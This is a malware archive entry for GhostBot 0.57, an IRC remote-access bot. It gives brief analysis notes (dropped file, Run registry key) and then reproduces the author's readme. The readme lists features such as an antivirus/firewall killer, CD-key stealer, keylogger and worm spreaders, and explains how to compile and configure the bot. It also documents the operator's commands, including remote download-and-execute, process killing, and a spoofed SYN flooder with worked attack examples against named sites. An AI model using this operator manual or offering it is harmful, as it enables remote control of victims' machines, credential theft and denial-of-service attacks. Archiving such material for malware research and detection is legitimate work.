GhostBot 0.57

Copyright © MegaSecurity

By Positron


Informations
Author Positron
Family GhostBot
Category Remote Access
Version GhostBot 0.57
Language Delphi, compressed with UPX
Additional Information
GhostBot:
dropped file:
c:\WINDOWS\2K2YAXJO8u7rbl.exe
size: 35.049 bytes  

startup:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run "CFINET32"
data: C:\WINDOWS\2K2YAXJO8u7rbl.exe 

does (try to) connect to an IRC server

tested on Windows XP
19 November 2004

Author Information / Description
;-----------------------------------------------------------------------------------;
; BOT Name: Ghost-BOT 0.57                                                          ;
; --------------------------------------------------------------------------------- ;
; Features:                                                                         ;
;          - SpyBot compatible commands,                                            ;
;          - AV/FW killer,                                                          ;
;          - CD-Key Stealer,                                                        ;
;          - Mydoom spreader,                                                       ;
;          - NetBIOS spreader,                                                      ; 
;          - Encrypted strings in EXE,                                              ;
;          - Web-server (http://xxx.xxx.xxx.xxx:Port),                              ;
;          - API search engine by CRC32 (used only for important APIs),             ;
;          - KeyLogger (Keylog file can be download from webserver too),            ;
;          - P2P spreader (Kazaa, Edonkey, Morpheus, XoloX, ShareAza, LimeWire,     ;
;          - Prepend all .exe files in shared dirs if they are smaller than 5MB,    ;
;          - Support DCC SEND, DCC GET, DCC CHAT and topic commands.                ;
;                                                                                   ;
; --------------------------------------------------------------------------------- ;
; Compile:                                                                          ;
;          - Run make.bat to compile the source! (Tested with Delphi 6)             ;
; --------------------------------------------------------------------------------- ;
;          - \System                                                                ;
;                 System.dcu, sysinit.dcu and so on units replacement for Delphi 6  ;
;                 Allows to make program size smaller onto about 9,5K.              ;
;          - \ACLUnits                                                              ;
;                 SysUtils and Registry units replacement.                          ;
;          - \Resources                                                             ;
;                 Necessary Icon and INI files.                                     ;
;-----------------------------------------------------------------------------------;
v0.57 
   -Fixed !uninstall. Now able to delete hidden files too,

   
BOT SETTINGS:
-------------

  - Settings.ini include the main settings for compiler.
  
  - .\Resources\ (All srings inside .\resources\*.str files will be encrypted after compile):
        TBOT.str - Main parameters of the BOT. You can freely change them.
        TP2PFILENAMES.str - File names of P2P spreader.
        TCDKEYS.str - parameters of CD-Key stealer ->   (1 KEY = 3 parameter)
                                                        1=SWAT3,           <- Software name
                                                        2=WON\CDKeys,      <- Registry key
                                                        3=SWAT3,           <- Registry value
                                                        ....
        TIRCSSERVERS.str - Here you can give unlimited number of IRC servers.
        TAUTHHOST.str - List of allowed host(s) at !login command.

COMMANDS LIST: (Note: Only the "login" command is case sensitive)
--------------

login password                                  (example: login hello)
delete [filename]                               (example: delete c:\windows\temp.exe)
execute [filename]                              (example: delete c:\windows\temp.exe)
rename [origenamfile] [newfile]                 (example: rename c:\windows\temp.exe c:\windows\driver.exe)
makedir [dirname]				(example: makedir c:\test\)
info                                            (info: gives some info)
killprocess [processname]                       (example: killprocess mcafee.exe)
disconnect [sec.]                               (info: disconnect the bot for x sec. if sec. is not given it disconnect the bot for 30mins.)
quit                                            (info: bot quits running)
download [url] [filename]                       (example: download http://127.0.0.1/server.exe c:\driver.exe) (info: Dot forget "http://" string in URL!)
httpserver [Port] [root-dir]                    (example: httpserver 81 c:\)
listprocesses                                   (info: lists all running proccesses)
op
get [filename]					(example: get c:\command.com will trigger a dcc send on the remote pc)                                             
raw [raw command]                               (example: raw PRIVMSG #ghostbot :hello)
threads                                         (info: will list al threads)
list [path+filter]                              (example: list c:\*.*)
cdkeys                                          (info: search CD-Keys on server's computer)
restart                                         (info: restarts the server's computer)
shutdown                                        (info: shuts down the server's computer)
ipscan [StartIP] [port]                         (example: ipscan 1.1.1.1 3137)
stopipscan                                      (info: stop IP scanner)
uninstall                                       (info: remove BOT)
startmydoom                                     (info: restart MyDoom spreader) 
stopmydoom                                      (info: stop MyDoom spreader)
startavfwkiller                                 {info: restart AV/FW killer}
stopavfwkiller                                  {info: stop AV/FW killer}
starnetbios                                     {info: (re)start netbios spreader} 
stopnetbios                                     {info: stop netbios spreader}
mirccmd                                         {example: mirccmd /msg #GhostBOT Hi!} {info: send message to victim's mIRC (if mIRC is open)

clone [srv.] [port] [chan] [number of clones]   (example: clone 1.1.1.1 6667 #abc 4)
rawclones [command]                             (example: rawclones PRIVMSG #ABCD :hello ; info: some servers do not allow more than 1 clone) 
killclones                                      (info: remove all clones)

stopsyn                                         (info: stop syn flooder)

update [URL]                                    (example: update http://www.nasa.gov\1.exe) (info: Dot forget "http://" string in URL!)
                                               
Syn Flooder command
-------------------
                                  
  syn [victim] [options]                        

  Options:
    -S:    Spoof host                         (0 is random (default))
    -p:    Separated list of dest ports       (0 is random (default))
    -s:    Separated list of src ports        (0 is random (default))
    -n:    Number of packets                  (0 is continuous (default))
    -d:    Delay (in ms)                      (default 0)

  Example I: syn www.kazaa.com -p 21,23,80,110

    On this attack:
      - Victim: www.kazaa.com
      - Source IP: Random
      - Destination ports: 21 + 23 + 80 + 110
      - Source ports: Random
      - Count: Continuous
      - Delay: 0 ms (no delay between packets)

  Example II: syn www.kazaa.org -S www.edonkey.com -p 21,80 -s 42,63 -n 1 -d 50

    On this attack:
      - Victim: www.kazaa.com
      - Source IP/host: www.edonkey.com
      - Destination ports: 21 + 80
      - Source ports: 42 + 63
      - Count: 1
          * Please note that 1 count will send the syn packets from every *
          * source port to every destination port. This means 4 packets   *
          * will be transmited with a 1 count on this attack.             *
      - Delay: 50 ms


Positron

If you recognize any personal information on this page and wish to have it removed or redacted, please contact us at jplesueur@phrozen.io. We are committed to protecting your privacy in accordance with GDPR regulations.